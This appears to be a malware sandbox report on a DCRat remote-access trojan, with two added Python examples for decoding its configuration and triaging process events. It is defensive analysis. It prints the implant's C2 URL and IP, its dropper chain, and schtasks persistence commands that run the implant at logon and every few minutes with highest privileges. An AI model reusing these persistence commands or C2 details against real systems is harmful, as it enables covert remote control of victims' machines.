
Windows Analysis Report
j0GOUGjcJD.exe

Overview

General Information

Sample name: j0GOUGjcJD.exe (renamed because the original name is a hash value)
Original sample name: 2b577aea211c0031d052f521c6d5c0ec.exe
Analysis ID: 1524358
MD5: 2b577aea211c0031d052f521c6d5c0ec
SHA1: 7cf36171d6c2dae4646132b6ebafd00bf6a38892
SHA256: acbf2913aa4a2385d29179f5a9c0add2fff6bb34adab4669d02793a5c1317cc9
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • j0GOUGjcJD.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\j0GOUGjcJD.exe" MD5: 2B577AEA211C0031D052F521C6D5C0EC)
    • wscript.exe (PID: 2936 cmdline: "C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2496 cmdline: C:\Windows\system32\cmd.exe /c ""C:\winSaves\UEmczQViUsQALT5sK5Im3o.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • fontsavesbroker.exe (PID: 2332 cmdline: "C:\winSaves\fontsavesbroker.exe" MD5: 173D5AC0A5C8FBF0A3990DFD33A329B5)
          • schtasks.exe (PID: 7148 cmdline: schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Windows\Cursors\SearchApp.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2692 cmdline: schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\Cursors\SearchApp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3544 cmdline: schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Windows\Cursors\SearchApp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6756 cmdline: schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTST" /sc MINUTE /mo 11 /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5672 cmdline: schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTS" /sc ONLOGON /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5720 cmdline: schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTST" /sc MINUTE /mo 13 /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 6448 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vxPvY9xhrB.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • w32tm.exe (PID: 7112 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • fontsavesbroker.exe (PID: 4592 cmdline: "C:\winSaves\fontsavesbroker.exe" MD5: 173D5AC0A5C8FBF0A3990DFD33A329B5)
  • cleanup

Malware Configuration

{"SCRT": "{\"i\":\"_\",\"U\":\"|\",\"w\":\";\",\"n\":\"%\",\"Q\":\"<\",\"M\":\"~\",\"H\":\"$\",\"J\":\".\",\"O\":\"*\",\"y\":\"@\",\"a\":\"-\",\"g\":\"(\",\"0\":\" \",\"5\":\"`\",\"3\":\"!\",\"E\":\"^\",\"N\":\">\",\"k\":\"#\",\"V\":\")\",\"2\":\"&\",\"9\":\",\"}", "PCRT": "{\"D\":\"%\",\"Q\":\"`\",\"i\":\"#\",\"0\":\"&\",\"x\":\"~\",\"6\":\"(\",\"e\":\"_\",\"c\":\";\",\"M\":\">\",\"I\":\"*\",\"X\":\",\",\"=\":\".\",\"y\":\"|\",\"w\":\"-\",\"b\":\"$\",\"j\":\"<\",\"S\":\" \",\"f\":\"!\",\"p\":\")\",\"l\":\"^\"}", "TAG": "", "MUTEX": "DCR_MUTEX-rkpdSgdOsmNqJJb4B3xN", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://ch67763.tw1.ru/@==gbJBzYuFDT", "H2": "http://ch67763.tw1.ru/@==gbJBzYuFDT", "T": "0"}
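The extracted configuration is JSON in which two fields, SCRT and PCRT, are themselves JSON documents serialised as strings. The following Python is an added example, not part of the Joe Sandbox report or of any DCRat tooling: it decodes the blob above into the indicators an analyst would pivot on (mutex, C2 URLs and hosts, the search path) and turns the two nested tables into usable character maps. Treating SCRT and PCRT as single-character substitution tables is an assumption drawn only from their shape (every key and every value is one character); the report does not say what the implant uses them for.

```python
import json
from urllib.parse import urlsplit

# Configuration exactly as printed in the report (copied, not constructed).
CONFIG = r'''{"SCRT": "{\"i\":\"_\",\"U\":\"|\",\"w\":\";\",\"n\":\"%\",\"Q\":\"<\",\"M\":\"~\",\"H\":\"$\",\"J\":\".\",\"O\":\"*\",\"y\":\"@\",\"a\":\"-\",\"g\":\"(\",\"0\":\" \",\"5\":\"`\",\"3\":\"!\",\"E\":\"^\",\"N\":\">\",\"k\":\"#\",\"V\":\")\",\"2\":\"&\",\"9\":\",\"}", "PCRT": "{\"D\":\"%\",\"Q\":\"`\",\"i\":\"#\",\"0\":\"&\",\"x\":\"~\",\"6\":\"(\",\"e\":\"_\",\"c\":\";\",\"M\":\">\",\"I\":\"*\",\"X\":\",\",\"=\":\".\",\"y\":\"|\",\"w\":\"-\",\"b\":\"$\",\"j\":\"<\",\"S\":\" \",\"f\":\"!\",\"p\":\")\",\"l\":\"^\"}", "TAG": "", "MUTEX": "DCR_MUTEX-rkpdSgdOsmNqJJb4B3xN", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://ch67763.tw1.ru/@==gbJBzYuFDT", "H2": "http://ch67763.tw1.ru/@==gbJBzYuFDT", "T": "0"}'''


def load_config(text):
    """Parse the outer JSON, then SCRT/PCRT, which are JSON documents stored as strings."""
    cfg = json.loads(text)
    for key in ("SCRT", "PCRT"):
        if isinstance(cfg.get(key), str):
            cfg[key] = json.loads(cfg[key])
    return cfg


def extract_iocs(cfg):
    """Collect the fields an analyst pivots on. H1/H2 are de-duplicated: here both are identical."""
    urls = sorted({cfg[k] for k in ("H1", "H2") if cfg.get(k)})
    hosts = sorted({urlsplit(u).hostname for u in urls})
    return {
        "mutex": cfg.get("MUTEX"),
        "c2_urls": urls,
        "c2_hosts": hosts,
        "search_path": (cfg.get("ASCFG") or {}).get("searchpath"),
        # Boolean switches kept verbatim; their meaning is not documented in the report.
        "flags": {k: cfg[k] for k in ("LDTM", "DBG", "AS", "ASO", "AD") if k in cfg},
    }


def invert(table):
    """Reverse a substitution table; refuse if two keys map to the same character."""
    inv = {v: k for k, v in table.items()}
    if len(inv) != len(table):
        raise ValueError("substitution table is not injective; cannot be inverted")
    return inv


def apply_table(text, table):
    """Replace each character that has an entry in `table`; others pass through unchanged.
    (Assumption: SCRT/PCRT are per-character substitution maps, inferred from their shape.)"""
    return "".join(table.get(ch, ch) for ch in text)


if __name__ == "__main__":
    cfg = load_config(CONFIG)
    print(json.dumps(extract_iocs(cfg), indent=2))
    print("SCRT entries:", len(cfg["SCRT"]), "PCRT entries:", len(cfg["PCRT"]))
    encoded = apply_table("Mig0y", cfg["SCRT"])
    print(repr(encoded), "->", repr(apply_table(encoded, invert(cfg["SCRT"]))))
```

invert() refusing a non-injective table is the check worth keeping: a substitution map with collisions cannot be reversed by lookup alone, and a sample carrying such a table would need its decoding routine recovered from the binary instead. Note also that a character absent from the table passes through unchanged, so a round trip is only guaranteed for input drawn from the table's keys.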

Yara Overview

Source | Rule | Description | Author | Strings
00000010.00000002.1890656655.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000011.00000002.1891516685.000000000303E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000010.00000002.1890656655.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000013.00000002.1933324919.0000000002A65000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000013.00000002.1933324919.0000000002A98000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
(8 entries in total; 5 shown)

Sigma Overview

System Summary

Source: Process started | Sigma rule: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe", CommandLine: "C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\j0GOUGjcJD.exe", ParentImage: C:\Users\user\Desktop\j0GOUGjcJD.exe, ParentProcessId: 7000, ParentProcessName: j0GOUGjcJD.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe", ProcessId: 2936, ProcessName: wscript.exe
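The Sigma match above and the schtasks and w32tm command lines in the process tree lend themselves to a small triage rule set. The following Python is an added example, not part of the Joe Sandbox report and not a Sigma rule: the events are constructed from this report's process tree plus one benign control task, the field names (pid, ppid, image, cmdline) are an assumed schema rather than a particular EDR's, and the trusted-directory list and the reading of w32tm /stripchart against localhost as a delay are judgement calls of the example, not findings of the report.

```python
import re

SCRIPT_EXT = (".vbe", ".vbs", ".js", ".jse", ".wsf", ".vba")
# Directories from which a legitimately installed scheduled task would normally run.
# This list is a judgement call of the example, not a finding of the report.
TRUSTED_TASK_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Process-creation events constructed from the report's process tree, plus one benign
# control task (PID 9001) that must not fire. The schema (pid, ppid, image, cmdline) is
# assumed; map it onto your own EDR or Sysmon event ID 1 fields.
EVENTS = [
    {"pid": 7000, "ppid": 0, "image": r"C:\Users\user\Desktop\j0GOUGjcJD.exe",
     "cmdline": r'"C:\Users\user\Desktop\j0GOUGjcJD.exe"'},
    {"pid": 2936, "ppid": 7000, "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe"'},
    {"pid": 2496, "ppid": 2936, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c ""C:\winSaves\UEmczQViUsQALT5sK5Im3o.bat" "'},
    {"pid": 2332, "ppid": 2496, "image": r"C:\winSaves\fontsavesbroker.exe",
     "cmdline": r'"C:\winSaves\fontsavesbroker.exe"'},
    {"pid": 2692, "ppid": 2332, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'''schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\Cursors\SearchApp.exe'" /rl HIGHEST /f'''},
    {"pid": 3544, "ppid": 2332, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'''schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Windows\Cursors\SearchApp.exe'" /rl HIGHEST /f'''},
    {"pid": 7112, "ppid": 6448, "image": r"C:\Windows\System32\w32tm.exe",
     "cmdline": r"w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2"},
    {"pid": 9001, "ppid": 9000, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn "VendorUpdate" /sc DAILY /tr "C:\Program Files\Vendor\update.exe" /f'},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_schtasks(cmdline):
    """Return the /tn /sc /mo /tr /rl options of a `schtasks /create` line, or None if not a create."""
    if not re.search(r"/create\b", cmdline, re.I):
        return None
    opts = {}
    for key in ("tn", "sc", "mo", "tr", "rl"):
        m = re.search(r'/%s\s+("[^"]*"|\S+)' % key, cmdline, re.I)
        if m:
            # The report's tasks wrap the action in both " and ' quotes; strip both layers.
            opts[key] = m.group(1).strip('"').strip("'")
    return opts


def classify(ev):
    """Return the list of reasons this event is suspicious (empty when no rule matches)."""
    reasons = []
    image = basename(ev["image"])
    cl = ev["cmdline"]
    low = cl.lower()

    # Same condition as the Sigma rule matched above: a script host given a script file.
    if image in ("wscript.exe", "cscript.exe") and any(ext in low for ext in SCRIPT_EXT):
        reasons.append("script host executing a script file")

    # Persistence via schtasks: highest run level, minute-granular re-launch, untrusted action path.
    if image == "schtasks.exe":
        opts = parse_schtasks(cl)
        if opts:
            action = opts.get("tr", "")
            if opts.get("rl", "").upper() == "HIGHEST":
                reasons.append("task runs with /rl HIGHEST")
            if opts.get("sc", "").upper() == "MINUTE":
                reasons.append("task re-launches every %s minute(s)" % opts.get("mo", "1"))
            if action and not action.lower().startswith(TRUSTED_TASK_DIRS):
                reasons.append("task action outside trusted directories: %s" % action)

    # w32tm /stripchart against localhost: read here as a batch-file delay (assumption).
    if image == "w32tm.exe" and "/stripchart" in low and "localhost" in low:
        reasons.append("w32tm stripchart used as a delay")
    return reasons


def triage(events):
    """Map PID -> reasons for every event that triggers at least one rule."""
    return {ev["pid"]: classify(ev) for ev in events if classify(ev)}


if __name__ == "__main__":
    for pid, why in triage(EVENTS).items():
        print(pid, "->", "; ".join(why))
```

classify() returns one reason per rule so the analyst sees why a PID was flagged rather than a bare score. The trusted-directory check is what separates the two SearchApp tasks (action in C:\Windows\Cursors) from the control task under Program Files, and the interval check isolates the minute-scheduled task that re-launches the implant if its process is killed.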

Suricata IDS Alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-02T17:54:09.177576+0200 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 92.53.106.114 | 80 | TCP
2024-10-02T17:55:01.554601+0200 | 2850862 | 1 | Malware Command and Control Activity Detected | 92.53.106.114 | 80 | 192.168.2.4 | 52503 | TCP
2024-10-02T17:57:15.352150+0200 | 2850862 | 1 | Malware Command and Control Activity Detected | 92.53.106.114 | 80 | 192.168.2.4 | 52527 | TCP

            AV Detection

Source: j0GOUGjcJD.exe | Avira: detected
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\winSaves\0VySiddKAXOECI1ul.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\vxPvY9xhrB.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Windows\Cursors\SearchApp.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\winSaves\fontsavesbroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: 00000010.00000002.1890656655.0000000002E81000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"SCRT": "{\"i\":\"_\",\"U\":\"|\",\"w\":\";\",\"n\":\"%\",\"Q\":\"<\",\"M\":\"~\",\"H\":\"$\",\"J\":\".\",\"O\":\"*\",\"y\":\"@\",\"a\":\"-\",\"g\":\"(\",\"0\":\" \",\"5\":\"`\",\"3\":\"!\",\"E\":\"^\",\"N\":\">\",\"k\":\"#\",\"V\":\")\",\"2\":\"&\",\"9\":\",\"}", "PCRT": "{\"D\":\"%\",\"Q\":\"`\",\"i\":\"#\",\"0\":\"&\",\"x\":\"~\",\"6\":\"(\",\"e\":\"_\",\"c\":\";\",\"M\":\">\",\"I\":\"*\",\"X\":\",\",\"=\":\".\",\"y\":\"|\",\"w\":\"-\",\"b\":\"$\",\"j\":\"<\",\"S\":\" \",\"f\":\"!\",\"p\":\")\",\"l\":\"^\"}", "TAG": "", "MUTEX": "DCR_MUTEX-rkpdSgdOsmNqJJb4B3xN", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://ch67763.tw1.ru/@==gbJBzYuFDT", "H2": "http://ch67763.tw1.ru/@==gbJBzYuFDT", "T": "0"}
Source: C:\Windows\Cursors\SearchApp.exe | ReversingLabs: Detection: 87%
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe | ReversingLabs: Detection: 87%
Source: C:\winSaves\fontsavesbroker.exe | ReversingLabs: Detection: 87%
Source: j0GOUGjcJD.exe | ReversingLabs: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe | Joe Sandbox ML: detected
Source: C:\Windows\Cursors\SearchApp.exe | Joe Sandbox ML: detected
Source: C:\winSaves\fontsavesbroker.exe | Joe Sandbox ML: detected
Source: j0GOUGjcJD.exe | Joe Sandbox ML: detected
Source: j0GOUGjcJD.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: j0GOUGjcJD.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb (source: j0GOUGjcJD.exe)
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004DA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004EB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
Source: C:\winSaves\fontsavesbroker.exe | File opened: C:\Users\user
Source: C:\winSaves\fontsavesbroker.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\winSaves\fontsavesbroker.exe | File opened: C:\Users\user\AppData
Source: C:\winSaves\fontsavesbroker.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\winSaves\fontsavesbroker.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\winSaves\fontsavesbroker.exe | File opened: C:\Users\user\AppData\Local

            Networking

Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49730 -> 92.53.106.114:80
Source: Network traffic | Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 92.53.106.114:80 -> 192.168.2.4:52503
Source: Network traffic | Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 92.53.106.114:80 -> 192.168.2.4:52527
Source: Malware configuration extractor | URLs: http://ch67763.tw1.ru/@==gbJBzYuFDT
Source: fontsavesbroker.exe, 00000004.00000002.1802058996.0000000002F04000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004D718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\winSaves\fontsavesbroker.exe | File created: C:\Windows\Cursors\SearchApp.exe
Source: C:\winSaves\fontsavesbroker.exe | File created: C:\Windows\Cursors\38384e6a620884
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004D857B
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004D407E
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004FD00E
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004E70BF
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_00501194
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004F02F6
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004D3281
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004DE2A0
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004E6646
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004F070E
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004F473A
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004E37C1
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004D27E8
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004DE8A0
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004DF968
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004F4969
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004E6A7B
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004E3A3C
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004F0B43
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004FCB60
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004E5C77
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004E3D6D
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004DED14
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004EFDFA
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004DDE6C
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004DBE13
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004F0F78
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004D5F3C
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: String function: 004EE28C appears 35 times
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: String function: 004EE360 appears 52 times
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: String function: 004EED00 appears 31 times
Source: fontsavesbroker.exe.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: SearchApp.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: TGdhCspOsuwHWHVRmOneCNdUUqTS.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: j0GOUGjcJD.exe, 00000000.00000003.1677033090.0000000005591000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs j0GOUGjcJD.exe
Source: j0GOUGjcJD.exe, 00000000.00000003.1676270763.0000000006D63000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs j0GOUGjcJD.exe
Source: j0GOUGjcJD.exe, 00000000.00000003.1676662274.0000000007678000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs j0GOUGjcJD.exe
Source: j0GOUGjcJD.exe | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs j0GOUGjcJD.exe
Source: j0GOUGjcJD.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, wZueKEMgkhE4fHDZjM3.cs | Cryptographic APIs: 'TransformBlock'
Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, wZueKEMgkhE4fHDZjM3.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, VEvtpDhamCVIMfRdDDD.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, VEvtpDhamCVIMfRdDDD.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, wZueKEMgkhE4fHDZjM3.cs | Cryptographic APIs: 'TransformBlock'
Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, wZueKEMgkhE4fHDZjM3.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, VEvtpDhamCVIMfRdDDD.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, VEvtpDhamCVIMfRdDDD.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, ptkLbC0KAelfTu6MyGv.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, ptkLbC0KAelfTu6MyGv.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, ptkLbC0KAelfTu6MyGv.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, ptkLbC0KAelfTu6MyGv.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@24/12@0/0
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004D6EC9 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Code function: 0_2_004E9E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\winSaves\fontsavesbroker.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fontsavesbroker.exe.log
Source: C:\winSaves\fontsavesbroker.exe | Mutant created: NULL
